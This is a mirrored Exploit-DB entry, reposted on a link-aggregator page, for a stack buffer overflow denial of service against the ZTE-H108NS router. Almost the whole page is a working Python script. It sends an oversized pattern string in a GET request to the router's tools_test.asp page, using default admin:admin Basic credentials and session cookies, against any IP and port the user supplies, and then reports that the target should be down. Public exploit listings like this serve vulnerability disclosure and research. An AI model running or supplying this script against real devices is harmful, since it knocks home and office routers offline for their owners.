5
[dos] Router ZTE-H108NS - Stack Buffer Overflow (DoS)
source link: https://www.exploit-db.com/exploits/51137
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Router ZTE-H108NS - Stack Buffer Overflow (DoS)
# Exploit Title: ZTE-H108NS - Stack Buffer Overflow (DoS)
# Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# Usage: python zte-exploit.py <victim-ip> <port>
# CVE: N/A
# Tested on: Debian 5.18.5
#!/usr/bin/python3
import sys
import socket
from time import sleep
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"
* 5
buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"
+ junk + b"&TestBtn=START HTTP/1.1\r\n"
buffer += b"Host: 192.168.1.1\r\n"
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)
Gecko/20100101 Firefox/91.0\r\n"
buffer += b"Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
buffer += b"Accept-Encoding: gzip, deflate\r\n"
buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
buffer += b"Connection: Keep-Alive\r\n"
buffer += b"Cookie:
SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;
_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"
buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"
print("[*] Sending evil payload...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()
print("[+] Crashing boom boom ~ check if target is down ;)")
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK